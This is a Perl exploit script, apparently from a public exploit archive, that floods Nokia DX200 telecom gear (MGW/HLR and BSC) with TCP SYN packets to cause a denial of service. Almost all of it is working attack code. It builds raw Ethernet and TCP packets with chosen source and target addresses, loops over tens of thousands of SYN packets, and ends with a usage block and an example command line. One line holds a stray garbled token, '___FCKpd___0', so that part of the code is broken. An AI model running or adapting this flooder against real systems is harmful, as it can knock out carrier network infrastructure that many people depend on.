|
#######################################################################
#Vulnerability: Nokia TCP Syn Flood DoS - DX200
#Synopsis : Denial of Service
#Affected Platforms: DX200 M13 (MGW/HLR), S12 (BSC)
#Severity: High Risk
#Vendor: Nokia (http://www.nokia.com/)
#Exploit Release Date: 01/21/2009
#By: tambarus (tambarus@gmail.com)
#######################################################################
#!/usr/bin/perl
eval ("use Getopt::Long;");die "[error] Getopt::Long perl module is not installed \n" if $@;
eval ("use Net::RawIP;");die "[error] Net::RawIP perl module is not installed \n" if $@;
eval ("use Term::ProgressBar;");
die "[error] Term::ProgressBar perl module is not installed \n" if $@;
my $VERSION = "1.0";
print "$0, $PgmName, V $VERSION \n";
GetOptions (
"help" =>\$usage,
"device=s" => \$device,
"source=s" =>\$sourceip,
"dest=s"=>\$destip,
"sourcemac=s"=>\$sourcemac,
"destmac=s"=>\$destmac,
"port=n"=> \$tcpport,
);
my $timeout = "0,1"; # Timeout
if ($usage) {&usage;}
if (!$device) {
$device= 'eth0'; # Enter Nokia DX200 IP
}
if (!$destmac) {print "Dest MAC not found \n"; &usage;}
if (!$sourceip) {print "Source IP not found \n"; &usage;}
if (!$destip) {print "Dest IP not found \n"; &usage;}
if (!$tcpport) {print "TCP port not found \n"; &usage;}
my $syn="1"; # TCP SYN SET
my $tcpdata = "BLASTNOKIA"; # TCP payload
my $count=0;
#Initialize Progres Bar
my $progress = Term::ProgressBar->new(32768);
$progress->minor(0);
$packet = new Net::RawIP;
$packet-> ethnew($device);
if (!$sourcemac) {
$packet -> ethset( dest => $destmac);
}else {
$packet -> ethset( source =>$sourcemac, dest => $destmac);
}
for ($count=0; $count< 65537 ; $count++) {
$packet->set({
ip => {
saddr => $sourceip,
daddr => $destip
},
tcp => {
check => 0x0010 , # TCP Packet Checksum 0 for auto correct
source => $count,
dest => $tcpport,
syn => $syn,
data => $tcpdata
}});
$packet->ethsend($timeout);
#$packet->send($timeout);
$progress->update(___FCKpd___0
);
$count++;
}
sub usage {
print <<EOF ;
This vulnerability is already disclosed and can be exploited by TCP Syn Flooding.
usage: $0 [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC] [--destmac=MAC] [--port=n]
Options:
--help This message
--device Network interface (defaut set eth0)
--source Victim source IP
--dest Victim destination IP
--sourcemac Victim source MAC
--destmac MAC Address of the gateway
--port TCP port
Example: ./NokiaFlooder.pl --device eth0 --source 10.1.1.88 --dest 10.1.1.99 --sourcemac 00:11:22:22:11:00 --destmac 00:11:22:22:11:99 --port 23
EOF
exit shift;
}
|